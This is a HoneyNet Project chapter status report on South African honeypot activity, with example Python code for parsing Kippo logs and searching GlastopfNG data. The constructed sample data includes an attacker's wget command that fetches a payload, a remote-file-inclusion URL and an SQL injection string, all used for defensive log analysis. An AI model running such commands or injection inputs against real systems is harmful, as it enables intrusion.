As we are a new chapter in the HoneyNet Project, there have been no changes to the organizational structure. Barry and I are working on expanding the network within South Africa in an attempt to gain more sensor nodes and hopefully track attacks over a larger area within the country.
Barry Irwin provides hosting, advice and a lot of IP space within South Africa.
The following have been deployed within South African IP space:
The primary Kippo honeypot has seen a little interest from overseas attackers, although very few attacks seem to originate from within South Africa. This could be due to the IP space the honeypot is sitting in, although this is mostly speculation. The honeypot has had the following pieces of malware dropped and used:
Matt plans on writing a detailed report on each as soon as time permits.
On the Dionaea honeypot there has been little change in attacks. Conficker attacks (MS08-067) still feature very highly. However, on the 14th of April there was a rather large attack against MSSQL from 184.108.40.206. I have yet to decipher the content and context of the attack, but there were 7868 different attacks against the MSSQL service.
RESEARCH AND DEVELOPMENT
Matt is hoping to write some code to parse Kippo log files. The premise behind the tool is to parse the log files for attacking IP addresses, successful and failed logins, and any malware that may have been dropped.
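As an added illustration of what such a tool has to do (this is example code written for this report, not the chapter's own parser, which has not been written yet), the following Python groups Kippo log lines by session and extracts the three things listed above: the attacking IP address, each failed or successful login attempt, and any file the attacker pulled down. It also records the commands typed in each session, which is useful for spotting the "log in, run w, log off" pattern. The line layouts follow Kippo's text log format as I recall it (the `HoneyPotTransport,<session>,<ip>` tag, `login attempt [user/password] failed|succeeded`, `CMD:` and `Updated outfile` messages); the sample log below is constructed with documentation IP ranges, and the function names `parse_kippo_log` and `summarise` are my own.

```python
import re
from collections import Counter

# Constructed Kippo-style log excerpt (not a real capture). Two sessions:
# one that brute-forces root, succeeds and fetches a file; one that only fails.
SAMPLE_LOG = """\
2013-04-14 12:34:56+0200 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 192.0.2.10:51234 (10.0.0.5:2222) [session: 1]
2013-04-14 12:34:58+0200 [SSHService ssh-userauth on HoneyPotTransport,1,192.0.2.10] login attempt [root/123456] failed
2013-04-14 12:35:00+0200 [SSHService ssh-userauth on HoneyPotTransport,1,192.0.2.10] login attempt [root/password] succeeded
2013-04-14 12:35:10+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] CMD: w
2013-04-14 12:35:15+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] CMD: wget http://198.51.100.7/bb6.jpg
2013-04-14 12:35:16+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] Updated outfile /opt/kippo/dl/20130414123516_http___198_51_100_7_bb6_jpg
2013-04-14 13:01:02+0200 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.23:40000 (10.0.0.5:2222) [session: 2]
2013-04-14 13:01:03+0200 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/admin] failed
2013-04-14 13:01:04+0200 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/1234] failed
"""

# Twisted-style timestamp that opens every Kippo log line.
TS = r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4})"
# Per-session lines are tagged "HoneyPotTransport,<session id>,<client ip>" (assumed format).
SESS = r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\]"

NEW_CONN = re.compile(TS + r" \[kippo\.core\.honeypot\.HoneyPotSSHFactory\] New connection: "
                      r"(?P<ip>[\d.]+):(?P<port>\d+) \([\d.]+:\d+\) \[session: (?P<sid>\d+)\]")
LOGIN = re.compile(TS + r" \[SSHService ssh-userauth on " + SESS +
                   r" login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)")
CMD = re.compile(TS + r" \[SSHChannel .* on " + SESS + r" CMD: (?P<cmd>.*)")
OUTFILE = re.compile(TS + r" \[SSHChannel .* on " + SESS + r" Updated outfile (?P<path>\S+)")


def _session(sessions, sid, ip, ts):
    """Fetch or create the record for a session id (first line seen sets start time)."""
    return sessions.setdefault(sid, {"ip": ip, "start": ts, "logins": [],
                                     "commands": [], "downloads": []})


def parse_kippo_log(text):
    """Group log lines by Kippo session id.

    Returns {sid: {"ip", "start", "logins": [(user, password, succeeded)],
                   "commands": [...], "downloads": [...]}}. Lines that match
    none of the known messages are ignored.
    """
    sessions = {}
    for line in text.splitlines():
        for regex, kind in ((NEW_CONN, "conn"), (LOGIN, "login"), (CMD, "cmd"), (OUTFILE, "dl")):
            m = regex.match(line)
            if not m:
                continue
            sess = _session(sessions, m["sid"], m["ip"], m["ts"])
            if kind == "login":
                sess["logins"].append((m["user"], m["pw"], m["result"] == "succeeded"))
            elif kind == "cmd":
                sess["commands"].append(m["cmd"])
            elif kind == "dl":
                sess["downloads"].append(m["path"])
            break
    return sessions


def summarise(sessions):
    """Per-source-IP attempt and success counts, credential pairs tried, and dropped files."""
    attempts, successes, credentials = Counter(), Counter(), Counter()
    downloads = []
    for s in sessions.values():
        for user, pw, ok in s["logins"]:
            attempts[s["ip"]] += 1
            credentials[(user, pw)] += 1
            if ok:
                successes[s["ip"]] += 1
        downloads.extend((s["ip"], path) for path in s["downloads"])
    return {"attempts": attempts, "successes": successes,
            "credentials": credentials, "downloads": downloads}


if __name__ == "__main__":
    summary = summarise(parse_kippo_log(SAMPLE_LOG))
    for ip, n in summary["attempts"].most_common():
        print(f"{ip}: {n} login attempts, {summary['successes'][ip]} successful")
    for ip, path in summary["downloads"]:
        print(f"file dropped by {ip}: {path}")
```

Keying everything on the session id rather than the IP address is deliberate: a single source often opens many sessions, and the session is the unit that ties a successful login to the commands and downloads that followed it. The regexes are anchored at the start of the line, so a stray substring inside an attacker's command cannot be mistaken for a log message.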
Matt also wrote a very simple Python script to parse GlastopfNG logs from SQLite databases. The script allows searching for URLs and IP addresses within the database.
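To show the shape of such a search script, here is an added example (my own code, not Matt's script). The table layout is an assumption for illustration: a single `events` table with `time`, `source`, `request_url` and `pattern` columns, populated in memory with constructed rows, since I do not have GlastopfNG's real schema in front of me. The point worth copying is that the search terms are bound as parameters and the `LIKE` wildcards in them are escaped, so a URL pulled from an attacker's own request can be pasted into the search without it being interpreted as SQL or as a wildcard pattern.

```python
import sqlite3

# Assumed table layout, for illustration only; adjust to the real GlastopfNG schema.
SCHEMA = """CREATE TABLE events (
    id INTEGER PRIMARY KEY,
    time TEXT, source TEXT, request_url TEXT, pattern TEXT)"""

# Constructed sample rows (documentation IP ranges), not real honeypot data.
SAMPLE_ROWS = [
    ("2013-04-14 09:12:01", "192.0.2.44:53120", "/index.php?page=http://198.51.100.7/bb6.jpg?", "rfi"),
    ("2013-04-14 09:12:05", "192.0.2.44:53121", "/phpmyadmin/", "unknown"),
    ("2013-04-14 10:30:00", "203.0.113.9:4455", "/cgi-bin/test.cgi?id=1' or '1'='1", "sqli"),
]


def open_sample_db():
    """Build an in-memory database with the assumed schema and sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO events (time, source, request_url, pattern) VALUES (?, ?, ?, ?)",
                     SAMPLE_ROWS)
    conn.commit()
    return conn


def _like_pattern(term):
    """Wrap a literal search term for a substring LIKE, escaping its wildcards.

    Backslash is declared as the ESCAPE character in the query, so '%' and '_'
    typed by the user match themselves instead of acting as wildcards.
    """
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return "%" + escaped + "%"


def search_events(conn, ip=None, url=None):
    """Return (time, source, request_url, pattern) rows matching the given filters.

    Both filters are substring matches; supplying neither returns every event.
    Values are bound as parameters, never interpolated into the SQL text.
    """
    clauses, params = [], []
    if ip:
        clauses.append("source LIKE ? ESCAPE '\\'")
        params.append(_like_pattern(ip))
    if url:
        clauses.append("request_url LIKE ? ESCAPE '\\'")
        params.append(_like_pattern(url))
    sql = "SELECT time, source, request_url, pattern FROM events"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    sql += " ORDER BY time"
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = open_sample_db()
    for row in search_events(db, url="bb6.jpg"):
        print(row)
    for row in search_events(db, ip="192.0.2.44"):
        print(row)
```

Searching for `bb6.jpg` returns only the remote-file-inclusion attempt, and searching for the source `192.0.2.44` returns both of that host's requests. A search term such as `' OR 1=1 --` or a lone `_` returns nothing rather than every row, which is the behaviour you want from a tool that is fed attacker-controlled strings.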
There seems to be very little SSH activity coming to the honeypots within South Africa. While there are many brute-force attempts that prove successful, there are very few “returns” or actual login activity. At most the attackers will log in, run “w” or “uptime” and then log off. I’d like to experiment a little more with Kippo and see if there is something that could be tipping off attackers to the presence of a honeypot.
The Dionaea pot has seen a few attacks other than the usual MSSQL/SMB/08-067 attacks. Of the 125 submissions, there have been 24 unique samples from 46 unique source IP addresses.
The most prominent malware sample seems to be “bb6.jpg” (MD5 ebbfa21230fdda9eccf16ae4295534d3), which originates from 220.127.116.11.
Information gathering on attacker IP addresses etc. is done using Maltego CE. We are currently working on getting a licensed copy of Maltego from Paterva, who have graciously offered to assist us. Until such time as we have a licensed copy, we will be unable to publish any of this information, as the CE edition doesn’t allow for exporting of graphs.
Malware analysis done by Matt Erasmus is a combination of static and dynamic analysis. This is done using various tools and processes on a Windows XP virtual machine running in VMware Fusion.
Some of the tools used during static analysis include:
El Jefe has been reviewed but didn’t produce output that was useful for reporting purposes.
Most analysis and tracking is working well. Time is the biggest issue hampering research and investigation. The area where improvement is most needed is probably attack tracking and correlation.
PAPERS AND PRESENTATIONS
Matt is working on a presentation for ZaCon (http://zacon.org.za), which will take place in October. There will also be presentations at ISSA and BSidesCapeTown when those conferences happen. More information on these presentations will be announced as and when they are ready for public consumption.
The main area of improvement would be to widen the area of tracking within South Africa. We have spoken to interested parties and will continue to attempt to grow the network and awareness of the HoneyNet Project within South Africa.
While we are a new chapter, there is a lot to do and a lot of support to build. It’s going to be a very good year for the South African Chapter.